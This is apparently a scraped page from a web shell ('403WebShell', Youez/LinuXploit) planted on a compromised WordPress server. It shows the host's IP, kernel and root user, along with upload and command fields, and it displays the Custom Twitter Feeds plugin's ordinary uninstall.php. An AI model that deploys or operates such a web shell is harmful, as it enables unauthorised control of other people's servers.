WordPress

Briefly unavailable for scheduled maintenance.
Check back in a some hours.
403WebShell
403Webshell
Server IP : 38.242.244.58  /  Your IP : 216.73.216.62
Web Server : Apache/2.4.41 (Ubuntu)
System : Linux vmi1486879.contaboserver.net 5.4.0-166-generic #183-Ubuntu SMP Mon Oct 2 11:28:33 UTC 2023 x86_64
User : root ( 0)
PHP Version : 7.4.3-4ubuntu2.19
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/html/tribe_david.broken/wp-content/plugins/custom-twitter-feeds/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/tribe_david.broken/wp-content/plugins/custom-twitter-feeds/uninstall.php
<?php
if ( ! defined( 'WP_UNINSTALL_PLUGIN' ) ) {
	exit();
}

//If the user is preserving the settings then don't delete them
$options = get_option( 'ctf_options' );
$ctf_preserve_settings = isset( $options['preserve_settings'] ) ? $options['preserve_settings'] : false;

// allow the user to preserve their settings in case they are upgrading
if ( ! $ctf_preserve_settings ) {
	// clean up options from the database
	delete_option( 'ctf_options' );
	delete_option( 'ctf_configure' );
	delete_option( 'ctf_customize' );
	delete_option( 'ctf_style' );
	delete_option( 'ctf_statuses' );

	delete_option( 'ctf_rating_notice' );
	delete_option( 'ctf_notifications' );
	delete_option( 'ctf_local_avatars' );

	// delete tweet cache in transients
	global $wpdb;
	$table_name = $wpdb->prefix . "options";
	$wpdb->query( "
        DELETE
        FROM $table_name
        WHERE `option_name` LIKE ('%\_transient\_ctf\_%')
        " );
	$wpdb->query( "
        DELETE
        FROM $table_name
        WHERE `option_name` LIKE ('%\_transient\_timeout\_ctf\_%')
        " );

	//Delete all persistent caches (start with ctf_!)
	global $wpdb;
	$table_name = $wpdb->prefix . "options";
	$result = $wpdb->query("
        DELETE
        FROM $table_name
        WHERE `option_name` LIKE ('%ctf\_\!%')
        ");
	delete_option( 'ctf_cache_list' );

	// remove any scheduled cron jobs
	wp_clear_scheduled_hook( 'ctf_cron_job' );

	delete_option( 'ctf_usage_tracking_config' );
	delete_option( 'ctf_usage_tracking' );

	wp_clear_scheduled_hook( 'ctf_usage_tracking_cron' );
	wp_clear_scheduled_hook( 'ctf_feed_update' );

	delete_option( 'ctf_db_version' );
	delete_option( 'ctf_ver' );
	delete_option( 'ctf_welcome_seen' );
	delete_option( 'ctf_rating_notice' );
	delete_option( 'ctf_notifications' );
	delete_option( 'ctf_newuser_notifications' );
	delete_option( 'ctf_statuses' );
	delete_option( 'ctf_cron_report' );
	delete_option( 'ctf_legacy_feed_settings' );
	delete_option( 'ctf_check_license_api_when_expires' );
	delete_option( 'ctf_license_last_check_timestamp' );
	delete_option( 'ctf_license_data' );
	delete_option( 'ctf_license_key' );
	delete_option( 'ctf_license_status' );

	global $wpdb;

	$locator_table_name = $wpdb->prefix . 'ctf_feed_locator';
	$wpdb->query( "DROP TABLE IF EXISTS $locator_table_name" );

	$feed_caches_table_name = $wpdb->prefix . 'ctf_feed_caches';
	$wpdb->query( "DROP TABLE IF EXISTS $feed_caches_table_name" );

	$feeds_table_name = $wpdb->prefix . 'ctf_feeds';
	$wpdb->query( "DROP TABLE IF EXISTS $feeds_table_name" );
}


Youez - 2016 - github.com/yon3zu
LinuXploit